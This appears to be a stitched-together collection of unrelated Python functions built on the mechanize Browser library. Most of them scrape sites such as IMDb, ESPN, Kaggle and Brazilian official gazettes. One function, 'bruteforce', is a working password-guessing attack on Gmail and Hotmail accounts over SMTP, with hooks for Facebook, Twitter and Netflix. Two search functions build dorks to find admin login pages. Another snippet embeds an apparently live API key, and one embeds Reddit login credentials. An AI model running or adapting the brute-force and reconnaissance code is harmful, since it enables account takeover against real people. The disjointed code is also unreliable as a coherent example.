def main(): parser = argparse.ArgumentParser() parser.add_argument('--total-jobs', metavar='<total-jobs>', help='total number of jobs downloading documents', type=int) parser.add_argument('--job', metavar='<job>', help='job number between 1 and <total-jobs>', type=int) args = parser.parse_args() check_args(parser, args) br = Browser() br.set_handle_robots(False) # br.set_debug_responses(True) data = urlencode({'user': USERNAME, 'pass': getpass()}) document_urls = [LOGIN_PREFIX + url.strip() + '&view=etext' for url in file(DOCUMENT_URLS_FILE)] start = args.job - 1 step = args.total_jobs for url in iterview(document_urls[start::step]): try: get_document_pages(br, url, data) except Exception as e: print >> sys.stderr, '\n', (url, e)
def getScramArchByCMSSW(self): """ Get from the list of available CMSSW releases return a dictionary of ScramArchitecture by CMSSW """ # Set temporary conection to the server and get the response from cmstags url = 'https://cmssdt.cern.ch/SDT/cgi-bin/ReleasesXML' br = Browser() br.set_handle_robots(False) response=br.open(url) soup = BeautifulSoup(response.read()) # Dictionary form # {'CMSSW_X_X_X':[slc5_amd64_gcc472], ... } archByCmssw={} # Fill the dictionary for arch in soup.find_all('architecture'): for cmssw in arch.find_all('project'): # CMSSW release cmsswLabel = cmssw.get('label').encode('ascii', 'ignore') if cmsswLabel not in archByCmssw: archByCmssw[cmsswLabel]=[] # ScramArch related to this CMSSW release archName = arch.get('name').encode('ascii', 'ignore') archByCmssw[cmsswLabel].append(archName) return archByCmssw
class GetPIN(): def __init__(self,url,username, password): self.br = Browser() self.br.set_handle_equiv(False) self.br.set_handle_robots(False) self.url = url self.username = username self.password = password def getPIN(self): self.br.open(self.url) try: self.br.select_form(name="authZForm") self.br['userId'] = self.username self.br['passwd'] = self.password response = self.br.submit() data = response.readlines() except: data = self.br.response().readlines() pattern = r'<span class="fb">(.*?)</span>' pat = re.compile(pattern) for line in data: if pat.search(line): verifier = pat.findall(line) break if len(verifier): return verifier[0] else: return -1
def __init__(self): Browser.__init__(self) self.set_handle_robots(False) self.addheaders = [( 'Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' )]
def on_task_start(self, task, config): try: from mechanize import Browser except ImportError: raise PluginError('mechanize required (python module), please install it.', log) userfield = config.get('userfield', 'username') passfield = config.get('passfield', 'password') url = config['url'] username = config['username'] password = config['password'] br = Browser() br.set_handle_robots(False) try: br.open(url) except Exception as e: # TODO: improve error handling raise PluginError('Unable to post login form', log) #br.set_debug_redirects(True) #br.set_debug_responses(True) #br.set_debug_http(True) for form in br.forms(): loginform = form try: loginform[userfield] = username loginform[passfield] = password break except Exception as e: pass else: received = os.path.join(task.manager.config_base, 'received') if not os.path.isdir(received): os.mkdir(received) filename = os.path.join(received, '%s.formlogin.html' % task.name) with open(filename, 'w') as f: f.write(br.response().get_data()) log.critical('I have saved the login page content to %s for you to view' % filename) raise PluginError('Unable to find login fields', log) br.form = loginform br.submit() cookiejar = br._ua_handlers["_cookies"].cookiejar # Add cookiejar to our requests session task.requests.add_cookiejar(cookiejar) # Add handler to urllib2 default opener for backwards compatibility handler = urllib2.HTTPCookieProcessor(cookiejar) if urllib2._opener: log.debug('Adding HTTPCookieProcessor to default opener') urllib2._opener.add_handler(handler) else: log.debug('Creating new opener and installing it') urllib2.install_opener(urllib2.build_opener(handler))
def url_handler(data, lock): tweet = json.loads(data) if tweet['entities']['urls']: for index in range(len(tweet['entities']['urls'])): url = tweet['entities']['urls'][index]['expanded_url'] try: tweet['entities']['urls'][index]['url_title'] = "-" br = Browser() br.open(url) title = br.title() if title == None: title = "-" tweet['entities']['urls'][index]['url_title'] = title.encode('ascii','ignore') except (BrowserStateError, ParseError, UnicodeDecodeError, URLError): pass else: tweet lock.acquire() try: try: global count f = open('json/tweets-' + str(count) + '.json', 'a') if f.tell() >= 9900000: f.close() count += 1 f = open('json/tweets-' + str(count) + '.json', 'a') f.write(json.dumps(tweet) + "\n") f.close() except UnicodeDecodeError, e: pass finally: lock.release()
def down_image(self, img): print "down image from " + img down_br = Browser() down_cj = CookieJar() down_br.set_cookiejar(down_cj) fn = tempfile.mktemp(suffix='.png') return down_br.retrieve(img, filename = fn)[0]
def respond(bot, event): matches = [] for (ident, (regex, template)) in bot.commands_cache.iteritems(): match = regex.search(event.message) if match: params = match.groupdict() params['nick'] = event.source heappush( matches, (match.start(0), template.safe_substitute(params)) ) if not matches: if event.message.find("http") != -1: br = Browser() try: br.set_handle_robots(False) br.open(event.message) bot.send_channel_action(bot.config.messages.urltitle, title = format.bold('\"' + br.title() + '\"')) except: return False return True else: return False bot.send_channel_action(matches[0][1]) return True
def GetXboxLiveFriends(self): """Return a list of tuples (gamer_tag, gamer_presence).""" br = Browser() br.open('http://live.xbox.com/en-US/profile/Friends.aspx') br.select_form(name='f1') br['login'] = self.login br['passwd'] = self.passwd br.submit() # Submit login form. br.select_form(name='fmHF') response = br.submit() # Submit redirect form. friend_list = response.read() response.close() soup = BeautifulSoup(friend_list) friend_table = soup.find('table', {'class': FRIEND_TABLE_CLASS}) if friend_table is None: raise XboxLiveError('Parsing failure.') friends = [] for row in friend_table.contents[1:]: # Skip header row. gamer_tag = row.find('td', {'class': GAMER_TAG_CLASS}) gamer_tag = str(gamer_tag.find('a').contents[0]) gamer_presence = row.find('td', {'class': GAMER_PRESENCE_CLASS}) gamer_presence = str(gamer_presence.find('h4').contents[0]) friends.append((gamer_tag, gamer_presence)) return friends
def KILLMODE(): global FIRE, cdown if (FIRE): cdown = cdown + 1 global urlList, urlBList, Stats, stats # generate random ytube link x = ''.join([random.choice(string.ascii_letters + string.digits + "_-") for n in xrange(11)]) while x in urlList or x in urlBList: print "Generated Duplicate Link; Re-generating" x = ''.join([random.choice(string.ascii_letters + string.digits + "_-") for n in xrange(11)]) br = Browser() try: res = br.open("http://www.youtube.com/watch?v=" + x) data = res.get_data() soup = BeautifulSoup(data) title = soup.find('title') # bad links are titled 'Youtube' if title.renderContents() != "YouTube": urlList.append("http://www.youtube.com/watch?v=" + x) # good links have other titles else: urlBList.append("http://www.youtube.com/watch?v="+ x) except HTTPError, e: print "Error ", e.code print "ERROR at:: http://www.youtube.com/watch?v=" + x Stats.set("TRIES THIS ATTEMPT: " + str(cdown) + "\nSUCCESS: " + str(len(urlList)) + "\nFAIL: " + str(len(urlBList)))
def login_to_kaggle(self): """ Login to Kaggle website Parameters: ----------- None Returns: browser: Browser a mechanizer Browser object to be used for further access to site """ if self.verbose: print("Logging in to Kaggle..."), br = Browser() cj = cookielib.LWPCookieJar() br.set_cookiejar(cj) br.open(self.kag_login_url) br.select_form(nr=0) br['UserName'] = self.kag_username br['Password'] = self.kag_password br.submit(nr=0) if br.title() == "Login | Kaggle": raise KaggleError("Unable to login Kaggle with username %s (response title: %s)" % (self.kag_username,br.title())) if self.verbose: print("done!") return br
def google(query): print("\n\t[!] Searching on Google...\n") print("[QUERY] >> " + query) try: query = query.replace(" ", "+") req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query br = Browser() br.set_handle_robots(False) br.addheaders = [("User-agent", "chrome")] html = br.open(req).read() soup = BeautifulSoup(html, "html5lib") with open("./output/google-%s.txt" % query[8:], "w") as log: for results in soup.findAll(attrs={"class": "g"}): for title in results.findAll("h3", attrs={"class": "r"}): t = title.text t = t.title() for link in results.findAll(attrs={"class": "s"}): l = link.cite.text print(t) print(l + '\n') log.write(str(l) + '\n') except Exception as e: print(e)
def fetch_laws_page_from_year(year, temporaryDirectory): lawsDirectory = os.path.join(temporaryDirectory, 'all_laws'); if not os.path.exists(lawsDirectory): os.makedirs(lawsDirectory) print('The laws directory did not exist so I created it') print(lawsDirectory) fileToWriteLawsListIn = os.path.join(lawsDirectory, year + '.html') print('File to write in is ' + fileToWriteLawsListIn) lawWasNotDownloaded = not os.path.isfile(fileToWriteLawsListIn) if lawWasNotDownloaded: startDownload = int(round(time.time() * 1000)) print('Getting laws from year ' + year) url = get_ugly_url_for_laws(year) browser = Browser() browser.open(url) html = browser.response().get_data() with open(fileToWriteLawsListIn, 'a') as f: f.write (html) endDownload = int(round(time.time() * 1000)) print('Finished downloading laws for year ' + year + '. It took only ' + str(endDownload - startDownload) + ' milliseconds') else: print('This year was already fetched ' + year + '. Skipping to the next year')
def __init__(self, request, username,password,context=''): """ Al instanciar la classe, es loguejarà utilitzant el nom d'usuari i password proporcionats, Si browser_login conté algo són les cookies guardades de la última sessio loguejada que s'ha fet. Recarregarem les cookies en un Browser nou, i aixi estalviarà uns segons que consumiria del login. """ self.context=context self.request=request registry = self.request.registry self.epitool=registry.getUtility(IEPIUtility) self.username = username self.password = password self.browser_login, elk = self.epitool.recoverBrowserSession(self.request, self.username,'presencia') if self.browser_login: self.br=Browser() self.br.set_handle_robots(False) cj = LWPCookieJar() self.br.set_cookiejar(cj) for co in self.browser_login: ck = Cookie(version=co['version'], name=co['name'], value=co['value'], port=co['port'], port_specified=co['port_specified'], domain=co['domain'], domain_specified=co['domain_specified'], domain_initial_dot=co['domain_initial_dot'], path=co['path'], path_specified=co['path_specified'], secure=co['secure'], expires=co['expires'], discard=co['discard'], comment=co['comment'], comment_url=co['comment_url'], rest=co['rest']) cj.set_cookie(ck) print "Logging-in into presencia via browser" else: self.br = Browser() self.br.set_handle_equiv(False) self.login(message=u"Logging-in into presencia via regular login") return
def newBrowser(self): # Create new browsers all the time because its data structures grow # unboundedly (texas#135) br = Browser() br.add_password(self.hostname, self.username, self.password) br.set_handle_robots(None) return br
def num_itens(self,busca, data_inicial, data_final): try: br = Browser() self.endereco = 'http://www.imprensaoficial.com.br/PortalIO/DO/BuscaDO2001Resultado_11_3.aspx?f=xhitlist&xhitlist_sel=title%3bField%3adc%3atamanho%3bField%3adc%3adatapubl%3bField%3adc%3acaderno%3bitem-bookmark%3bhit-context&xhitlist_vpc=first&xhitlist_s=&xhitlist_q=('\ +busca+\ ')&filtrotodoscadernos=True&xhitlist_xsl=xhitlist.xsl&filtrocadernossalvar=todos%2cexeci%2cjucii%2casb%2cexecii%2cjudciii%2cjc%2ctrt2r%2cjudel%2cjudipi%2cjudipii%2ctrt15r%2cemp%2csup%2cdouj%2cdom%2ctjm%2ctre%2ctrt2aa%2cjfd%2coab&xhitlist_mh=9999&filtropalavraschave='\ +busca response1 = br.open(self.endereco) texto = response1.read() x1, x2, x3 = texto.partition('<span id="lblDocumentosEncontrados" class="tx_red">') x3, x2, x1 = x3.partition("</span></td>") x3 = x3.replace(",","") x3 = x3.strip() #Retorna o número de itens achados if x3 == "Um": return 1 except: print("Erro no endereço!") print(self.endereco) x3 = "0" if len(x3) > 0: return int(x3) else: return 0
def submit(self, timestamp, username, password, t_id, t_short, files, language): """Execute the request for a submission. timestamp (int): seconds from the start. username (string): username issuing the submission. password (string): password of username. t_id (string): id of the task. t_short (string): short name of the task. files ([dict]): list of dictionaries with keys 'filename' and 'digest'. language (string): the extension the files should have. """ logger.info("%s - Submitting for %s on task %s." % (to_time(timestamp), username, t_short)) if len(files) != 1: logger.error("We cannot submit more than one file.") return # Copying submission files into a temporary directory with the # correct name. Otherwise, SubmissionRequest does not know how # to interpret the file (and which language are they in). temp_dir = tempfile.mkdtemp(dir=config.temp_dir) for file_ in files: temp_filename = os.path.join(temp_dir, file_["filename"].replace("%l", language)) shutil.copy(os.path.join(self.import_source, "files", files[0]["digest"]), temp_filename) file_["filename"] = temp_filename filename = os.path.join(files[0]["filename"]) browser = Browser() browser.set_handle_robots(False) step(LoginRequest(browser, username, password, base_url=self.cws_address)) step(SubmitRequest(browser, (int(t_id), t_short), filename=filename, base_url=self.cws_address)) shutil.rmtree(temp_dir)
class Du8Doc: def __init__(self): self.br = Browser() def from_html(self, html): text = re.sub("<.+>\n", "", html) text = re.sub("</.+>\n", "", text) text = re.sub('(<br/?>\s*)+', '\n', text) text = re.sub(' ', ' ', text) return text def get_links(self, url): res = self.br.open(url) data = res.get_data() soup = BeautifulSoup(data, "html5lib") div_content = soup.find('table') urls = div_content.find_all("a") return [url.get('href') for url in urls ] def get_content(self, link): res = self.br.open(link) data = res.get_data() soup = BeautifulSoup(data, "html5lib") title, chapter = soup.html.title.string.split("-")[0:2] div_content = soup.find(id="content").prettify() content = self.from_html(div_content) return title, chapter, content
def google(self): print("\n\t[!] Searching on Google...\n") if self.dork == None: query = "site:" + self.target.replace("http://", "").replace("https://", "") + " inurl:(login||adm||admin||admin/account||controlpanel||adminitem||adminitems||administrator||administration||admin_area||manager||letmein||superuser||access||sysadm||superman||supervisor||control||member||members||user||cp||uvpanel||manage||management||signin||log-in||log_in||sign_in||sign-in||users||account)" else: query = "".join(self.dork) query = query.strip("'") print("[DORK] >> " + query) try: query = query.replace(" ", "+") req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query br = Browser() br.set_handle_robots(False) br.addheaders = [("User-agent", "chrome")] html = br.open(req).read() soup = BeautifulSoup(html, "html5lib") with open("./output/google-%s.txt" % self.target[8:], "w") as log: for results in soup.findAll(attrs={"class":"g"}): for title in results.findAll("h3", attrs={"class":"r"}): t = title.text t = t.title() for link in results.findAll(attrs={"class":"s"}): l = link.cite.text print (t) print (l + '\n') log.write(str(l) + '\n') except Exception as e: print(e)
def name(request, string): movie = string.replace("_", "+") br = Browser() br.open("http://www.imdb.com/find?s=tt&q="+movie) link = br.find_link(url_regex=re.compile(r"/title/tt.*")) data = br.follow_link(link) soup = BeautifulSoup(data.read()) title = soup.find('h1').contents[0].strip() name = title.replace(" ", "") rating = soup.find('span', itemprop='ratingValue').contents[0] duration = soup.find('time', itemprop='duration').contents[0].strip() releaseDate = soup.find('a', title='See more release dates').contents[0] director = soup.find('span', itemprop='director').getText() actor_all = [] actors = soup.findAll('span', itemprop='actors') for i in range(len(actors)): actor_all.append((actors[i].contents[1]).getText()) genres_all = [] genres = soup.findAll('span', itemprop='genre') for i in range(len(genres)): genres_all.append(genres[i].getText()) jsonObject = {} jsonObject['Name:'] = name jsonObject['IMDB Rating:'] = rating jsonObject['Duration'] = duration jsonObject["Actors: "] = actor_all jsonObject['Director:'] = director jsonObject['Genres'] = genres_all jsonObject['Release Date'] = releaseDate movie_details = json.dumps(jsonObject) return HttpResponse(movie_details)
def parseFeeds(self): mech = Browser() mech.addheaders = [ ('User-agent', 'Mozilla/5.0 (compatible)') ] mech.set_handle_robots(False) for url in self.feedUrls: #url = "http://feeds.feedburner.com/PurdueEngNews?format=xml" page = mech.open(url) html = page.read() soup = BeautifulStoneSoup(html) headlines = [] descriptions = [] i=0 self.newsList = [] for item in soup.findAll('item'): if (i > 20): break date = item.find('pubdate') title = item.find('title') link = item.find('link') desc = item.find('description') if (len(title.contents) > 0): title2 = title.contents[0] else: title2 = 'None' self.newsList.append(NewsStory(date.contents[0], title2, link.contents[0], \ desc.contents[0])) i+=1 for story in self.newsList: headlines.append(story.title) descriptions.append(story.link) #story.display() self.headlineList.append(headlines) self.descList.append(descriptions) self.populateTopicList()
def getLastEntries(self, url, lastDate): """ get all entries from an HTML table list if it is newer than prevEntry. Format is from graz FF site """ mech = Browser() mech.set_handle_robots(False) try: page = mech.open(url) except urllib2.HTTPError: if url == None: url = "(empty url)" self.logger.error("Could not read url "+url) return [] html = page.read() soup = BeautifulSoup(html) link = soup.findAll('a') if len(link) == 0: logger.error('No links in the page: %s', url) return [] returnLinks = [] for l in link: try: date = datetime.strptime(l.string, "topo-%Y-%m-%d-%H:%M.tsv.gz") except ValueError: continue if date > lastDate: returnLinks.append(url+l.string) else: break return returnLinks
def mrsc(gid): mech = Browser() url = "http://espn.go.com/ncf/playbyplay?gameId="+gid+"&period=0" #print url page = mech.open(url) html = page.read() print url if html.count('Play-by-play not currently available.') == 0: soup = BeautifulSoup(html) table = soup.findAll("table")[-1] rows = table.findAll('tr')[::-1] c=0 toret='' keepgoing=True cup=html[::-1][:html[::-1].find(' left; font: 700 14px/25px Helvetica,Arial,sans-serif;" colspan="3"><div style="margin-right: 6px;"'[::-1])][::-1] cup=cup[cup.find('a name="')+len('a name="'):] cup=cup[:cup.find('"')] while c < 7 and keepgoing and c < len(rows): cols = rows[c].findAll('td') #print rows[c] if len(cols) > 2: #if str(cols[2]) != '<td> </td>' and str(cols[3]) != '<td> </td>': toret=str(' '.join(cols[0].findAll(text=True)))+'. '+str(' '.join(cols[1].findAll(text=True))) keepgoing=False c=c+1 toret=toret.replace(' ',' ').strip() if toret != '': toret=toret+' ' poss='' if cup != '' and len(cup) < 30: poss=cup else: toret='' poss='' return [toret,poss]
def num_itens(self,busca, data_inicial, data_final): br = Browser() response1 = \ br.open("http://portal.in.gov.br/in/imprensa1/pesquisa_avancada") br.select_form(name="formBusca") br["texto_todas"] = busca br["dataPublicacaoInicial"] = data_inicial[:5] br["dataPublicacaoFinal"] = data_final[:5] br["ano"] = [data_final[-4:]] br["idJornal"] = ["1", "2", "3", "4"] # print(br.form) br.form.action = \ "http://www.in.gov.br/imprensa/pesquisa/pesquisaresultado.jsp" res = br.submit() texto = res.read() x1, x2, x3 = texto.partition("ite") x1, x2, x3 = x1.rpartition(">") try: arq = open(self.retornar_html(),"w") arq.write(texto) arq.close() except: print("Erro ao tentar salvar página de buscas!") x3 = x3.replace(",","") x3 = x3.strip() #Retorna o número de itens achados if x3 == "Um": return 1 if len(x3) > 0: return int(x3) else: return 0
def scrap_query(query, bang=None): r = ddg_query('imbd ' + query, bang=bang) if 'redirect' in dir(r) and 'primary' in dir(r.redirect): url = r.redirect.primary else: logger.info('Could not find imdb searchpage from DuckDuckGo bang') return None br = Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.2;\ WOW64) AppleWebKit/537.11 (KHTML, like Gecko)\ Chrome/23.0.1271.97 Safari/537.11')] r = br.open(url) soup = BeautifulSoup(r) for link in soup.find_all('a'): href = link.get('href','') match = re.search(r"imdb\.com/.*tt(?P<number>[^/]*)", href) if match: imdb_id = check_imdb(match.group('number')) return imdb_id return None
def gen_path(request): x = json.loads(request.POST['data']) #fetches data print x adj_mat = [] #creates empty adjacency matrix i1 = j1 = 0 num_cities = len(x) for i in x: tmp_mat = [] for j in x: if i!=j: API_KEY = "AIzaSyDBOSr6_XxvISPGX54P9bPnooE3RUpRTp0" orig_coord = x[i] dest_coord = x[j] br = Browser() #creates mechanize instance br.set_handle_robots(False) # print "https://maps.googleapis.com/maps/api/distancematrix/json?origins={0}&destinations={1}&key={2}".format(orig_coord, dest_coord, API_KEY) result = br.open("https://maps.googleapis.com/maps/api/distancematrix/json?origins={0}&destinations={1}&key={2}".format(orig_coord, dest_coord, API_KEY)).read() #makes a call to GoogleMapsAPI json_result = json.loads(result) tmp_mat.append(int(json_result['rows'][0]['elements'][0]['distance']['value'])) else: tmp_mat.append(0) adj_mat.append(tmp_mat) obj = ArpanDaErCode() ans = "" ans = ArpanDaErCode.solve(obj, adj_mat, num_cities) #gets sequence from model print ans ret = {'data': [str(ii) for ii in ans]} return HttpResponse(str(json.dumps(ret))) #returns the sequens in JSON format for the JS to handle
def __init__(self,options): (self.configfile,self.config,self.moduleconfig) = self.initialize_config(options) # If we have a particular log level for this module, use that, # otherwise use the global log level. If that isn't defined # either, use the INFO loglevel. if 'log' in self.moduleconfig: loglevel = self.moduleconfig['log'] else: loglevel = self.config.get('log','INFO') self.log = self.setup_logger(self.module_dir,loglevel) self.base_dir = self.config['datadir'] if self.browser_use_robustfactory: self.browser = Browser(factory=RobustFactory()) else: self.browser = Browser() self.browser.addheaders = [('User-agent', 'lagen.nu-bot ([email protected])')] # logger = logging.getLogger("mechanize") # logger.addHandler(logging.StreamHandler(sys.stdout)) # logger.setLevel(logging.DEBUG) # self.browser.set_debug_http(True) # self.browser.set_debug_responses(True) # self.browser.set_debug_redirects(True) self.ns = {'rinfo': Namespace(Util.ns['rinfo']), 'rinfoex':Namespace(Util.ns['rinfoex']), 'dct': Namespace(Util.ns['dct'])}
def lookup_offers_isbn(item_id): offers = [] br = Browser() res = br.open("http://books.half.ebay.com/ws/web/HalfISBNSearch?isbn=%s" % item_id) soup = BeautifulSoup(res.read()) ratings = soup.findAll('span',{'class': 'Header'}) for r in ratings: rating = r.text prices= r.parent.parent.parent.findNextSibling('table').findAll('tr')[1:] linktext = r.parent.parent.parent.findNextSiblings('table')[1].find(text=re.compile('View all.*')) if linktext: all = linktext.parent['href'] # get link res2 = br.open(all) soup = BeautifulSoup(res2.read()) rating2 = soup.findAll('span',{'class': 'Header'}) prices = rating2[0].parent.parent.parent.parent.findAll('table')[3].findAll('tr')[1:] for row in prices: m = re.search("itemid=(\d+)",row.find('a',href=re.compile("itemid=\d+"))['href']) itemid=m.group(1) seller = row.find('a',{'class':'SellerDisplayLink'}).text price = row.find('span',{'class':'ItemPrice'}).text price = string.replace(price,",","") if price.startswith("$"): price = price[1:] offers.append({ 'rating' : rating, 'seller' : seller, 'listing_id' : itemid, 'price' : str(price) }) print rating,seller,itemid,price return offers
def respond(permalink, text): br = Browser() user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1' br.addheaders = [('User-agent', user_agent)] soup = BeautifulSoup(br.open(permalink).read()) urlopen = urllib2.urlopen Request = urllib2.Request encode = urllib.urlencode cj = cookielib.LWPCookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) root_comment = soup.find('form', attrs={'class': 'usertext border'}) thing_id = root_comment.find('input', attrs={'name': 'thing_id'})['value'] print 'thing_id', thing_id # LOG THE F**K IN req = Request('http://www.reddit.com/api/login/username', encode({'user': '******', 'passwd': 'hackny', 'api_type': 'json'}), {'User-Agent': user_agent}) req_open = urlopen(req) read = json.loads(req_open.read()) modhash = read['json']['data']['modhash'] # POST THE F*****G COMMENT req = Request('http://www.reddit.com/api/comment', encode({'thing_id': thing_id, 'text': text + '\n\n*This is an automated response.*', 'uh': modhash}), {'User-Agent': user_agent}) req_open = urlopen(req) read = json.dumps(req_open.read())
def login_url( url, login, passwd, form_nomber, login_name, paswd_name, submit_nomber ): br = Browser(); showMessage('Создаю интерфейс браузера') cj = cookielib.LWPCookieJar() br.set_cookiejar(cj) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] br.open(url); showMessage('Загружаю сайт и произвожу вход') br.select_form(nr = form_nomber) br[login_name] = login br[paswd_name] = passwd res = br.submit(nr = submit_nomber) content = res.read() #определить число страниц maxPage = int(max_page(content)); showMessage('Определяю количество страниц и перехожу на последнюю') curPage = 84 while curPage < maxPage: res = br.open('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage)) curPage = maxPage maxPage = int(max_page(content)) content = res.read() #парсинг ключей if get_all_keys(content): webbrowser.open_new_tab('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage)) # Вернет True и откроет вкладку
def set_debug_redirect(self, *args, **kwargs): B.set_debug_redirect(self, *args, **kwargs) self._clone_actions['set_debug_redirect'] = ('set_debug_redirect', args, kwargs)
def set_handle_equiv(self, *args, **kwargs): B.set_handle_equiv(self, *args, **kwargs) self._clone_actions['set_handle_equiv'] = ('set_handle_equiv', args, kwargs)
def set_handle_refresh(self, *args, **kwargs): B.set_handle_refresh(self, *args, **kwargs) self._clone_actions['set_handle_refresh'] = ('set_handle_refresh', args, kwargs)
def set_handle_gzip(self, handle): B._set_handler(self, '_gzip', handle) self._clone_actions['set_handle_gzip'] = ('set_handle_gzip', (handle,), {})
class BetFair(): def __init__(self, url, filename, sample_time, n_attempts=2): self.filename = filename self.sample_time = sample_time self.n_attempts = n_attempts sleep_time = 5 self.url = url self.br = Browser() while (True): attempt = 0 for attempt in range(n_attempts): try: self._load_page() self.write_games_odds() break except: print('Erro!') time.sleep(sleep_time) time.sleep(self.sample_time - attempt * sleep_time) def _load_page(self): self.time = datetime.now().strftime('%Y-%m-%d %H:%M:%S') page_content = self.br.open(self.url).read() page = BeautifulSoup(page_content, "lxml") page = page.find_all('div', class_='content-multipick') self.page = page[0].find_all('div', class_='details-market market-3-runners') def _get_games_odds(self, pg): #TODO: tirar a porra desse slice start = str(pg.find_all('a')[0]).find('data-galabel') end = str(pg.find_all('a')[0]).find('data-loader') teams = str(pg.find_all('a')[0])[start + 14:end - 11].split(' x ') team1 = teams[0] team2 = teams[1] x1 = str(pg.find_all('a')[1].find().get_text().replace('\n', '')) x2 = str(pg.find_all('a')[2].find().get_text().replace('\n', '')) x3 = str(pg.find_all('a')[3].find().get_text().replace('\n', '')) return [team1, team2, x1, x2, x3] def write_games_odds(self): for pg in self.page: self._write_file(self._get_games_odds(pg)) def _write_file(self, line): try: with open(self.filename, "a") as f: f.write('\n' + self.time) for x in line: f.write(';' + x) except: print('Criando arquivo: ' + self.filename) with open(self.filename, "w") as f: f.write('\n' + self.time) for x in line: f.write(';' + x)
def set_cookiejar(self, *args, **kwargs): B.set_cookiejar(self, *args, **kwargs) self._clone_actions['set_cookiejar'] = ('set_cookiejar', args, kwargs)
def bruteforce(self): progress = Progressbar(self, orient=HORIZONTAL, length=200, mode='determinate') progress.place(x=600, y=200) use = OptionParser() use.add_option("-g", "--gmail", dest="gmail", help="Write Your Account gmail") use.add_option("-t", "--hotmail", dest="hotmail", help="Write Your Account hotmail") use.add_option("-T", "--twitter", dest="twitter", help="Write Your Account twitter") use.add_option("-f", "--facebook", dest="facebook", help="Write Your Account facebook") use.add_option("-n", "--netflix", dest="netflix", help="Write Your Account Netflix") use.add_option("-l", "--list", dest="list_password", help="Write Your list passowrd") use.add_option("-p", "--password", dest="password", help="Write Your passowrd ") use.add_option("-X", "--proxy", dest="proxy", help="Proxy list ") (options, args) = use.parse_args() brows = Browser() brows.set_handle_robots(False) brows._factory.is_html = True brows.set_cookiejar(cookielib.LWPCookieJar()) useragents = [ 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)', 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6' ] brows.addheaders = [('User-agent', random.choice(useragents))] brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) proxyList = options.proxy if options.gmail == None: if options.hotmail == None: if options.twitter == None: if facebook == None: if options.netflix == None: print(use.usage) exit() elif options.hotmail != None or options.gmail == None: smtp_srverH = smtplib.SMTP('smtp.live.com', 587) smtp_srverH.ehlo() smtp_srverH.starttls() if options.password != None or options.list_password == None: print("<<<<<<+++++Start Attacking Email+++++>>>>>") try: smtp_srverH.login(options.hotmail, options.password) print("Found Password :{} \t Found Hotmail:{}".format( options.password, options.hotmail)) Save = io.open( "Hotmail.txt", "a").write("Account Hotmail:" + options.hotmail + "\t\tPassword:"******"\n") except: print("Not Found Password : {} \t Email Hotmail:{}".format( options.password, options.hotmail)) elif options.list_password != None or options.password == None: password_list = io.open(options.list_password, "r").readlines() for password in password_list: try: print("<<<<<<+++++Start Attacking Email+++++>>>>>") smtp_srverH.login(options.hotmail, password) print("FOUND Password :{} \n Found Hotmail:{}".format( password, options.hotmail)) Save = io.open( "Hotmail.txt", "a").write("Account Hotmail:" + options.hotmail + "\t\tPassword:"******"\n") except smtplib.SMTPAuthenticationError: print("Not Found Password : {} \t Email Hotmail:{}". format(password, options.hotmail)) if options.twitter != None: hejab = threading.Thread(target=twitter, name="hejab") hejab.start() if options.facebook != None: facebook(brows) if options.netflix != None: netflix = threading.Thread(target=Netflix, name="Netflix") netflix.start() elif options.gmail != None or options.hotmail == None or options.twitter == None: smtp_srverG = smtplib.SMTP('smtp.gmail.com', 587) smtp_srverG.ehlo() smtp_srverG.starttls() if options.password != None or options.list_password == None: print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s" % (R, W)) try: smtp_srverG.login(options.gmail, options.password) print("Found Password :{} \t Found Gmail:{}".format( options.password, options.gmail)) Save = io.open("Gmail.txt", "a").write("Account Gmail:" + options.gmail + "\t\tPassword:"******"\n") except: print("Not Found Password : {} \t Email Gmail:{}".format( options.password, options.gmail)) elif options.list_password != None: password_list = io.open(options.list_password, "r").readlines() for password in password_list: password = password.rstrip("\n") print("<<<<<<+++++Start Attacking Email+++++>>>>>") try: smtp_srverG.login(options.gmail, password) print("{}<<<+++Found Password :{} \t Found Gmail:{}+++>>>". format(G, password, options.gmail)) Save = io.open("Gmail.txt", "a").write("Account Gmail:" + options.gmail + "\t\tPassword:"******"\n") break except smtplib.SMTPAuthenticationError: print( "{}<<<---Not Found Password : {} \t Email Gmail:{}--->>>" .format(R, password, options.gmail)) else: print(use.usage) exit()
def __init__(self, *args, **kwargs): self._clone_actions = {} B.__init__(self, *args, **kwargs) self.set_cookiejar(CookieJar())
